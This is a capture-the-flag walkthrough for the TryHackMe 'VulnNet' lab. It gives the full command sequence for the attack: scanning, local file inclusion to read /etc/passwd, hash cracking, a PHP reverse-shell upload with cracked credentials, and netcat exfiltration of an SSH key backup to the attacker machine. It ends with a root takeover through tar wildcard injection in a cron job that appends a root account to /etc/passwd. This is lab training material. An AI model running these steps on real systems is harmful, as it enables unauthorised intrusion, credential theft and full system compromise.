VulnNet

Room Link: https://tryhackme.com/room/vulnnet1

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u vulnnet.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

nikto -h vulnnet.thm

Browsing gobuster we can see a subdomain, broadcast.vulnnet.thm

Fuzz Subdomain

We can see broadcast again when we scan for it.

Kali

gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://vulnnet.thm  

LFI

One of the other js files shows we can use referer to look at files.

Confirmed it works

Kali

curl -s http://vulnnet.thm/?referer=/etc/passwd 

Kali

curl -s http://vulnnet.thm/?referer=/etc/passwd 

Crack Hash

Kali

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Username: developers
Password: 9972761drmfsls

TCP/80 - HTTP

Kali

gobuster -U developers -P 9972761drmfsls dir -u broadcast.vulnnet.thm -w /usr/share/wordlists/SecLists/Discovery/Web-C
ontent/directory-list-2.3-medium.txt -x php,html,txt

Initial Shell

exploit: https://www.exploit-db.com/raw/44250

Kali

nc -lvnp 1234

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cd php-reverse-shell/
curl -F "file=@php-reverse-shell.php" -F "plupload=1" -F "name=php-reverse-shell.php" http://broadcast.vulnnet.thm/actions/photo_uploader.php -u developers:9972761drmfsls

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Lateral Movement

Victim

cd /var/backups/
ls -lah

Netcat

Kali(receiving)

nc -l -p 1234 > ssh-backup.tar.gz

Victim(sending)

nc -w 3 $KALI 1234 < ssh-backup.tar.gz

Kali

tar xvf ssh-backup.tar.gz 

Kali

/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt

Kali

ssh -i id_rsa server-management@$VICTIM 
Password: oneTWO3gOyac

Privilege Escalation

exploit: https://gtfobins.github.io/gtfobins/tar/

Victim

cd /var/opt/
cat backupsrv.sh
ls -lah backupsrv.sh

Victim

cat /etc/crontab

Victim

cd /home/server-management/Documents
rm -rf 'Employee Search Progress Report.pdf' 
rm -rf 'Daily Job Progress Report Format.pdf'
touch ./--checkpoint=1
touch './--checkpoint-action=exec=sh shell.sh'
vi shell.sh

shell.sh

#!/bin/bash

echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd

Victim

chmod +x shell.sh

Once the cronjob runs are new root user will be created.

Victim

su new
Password: 123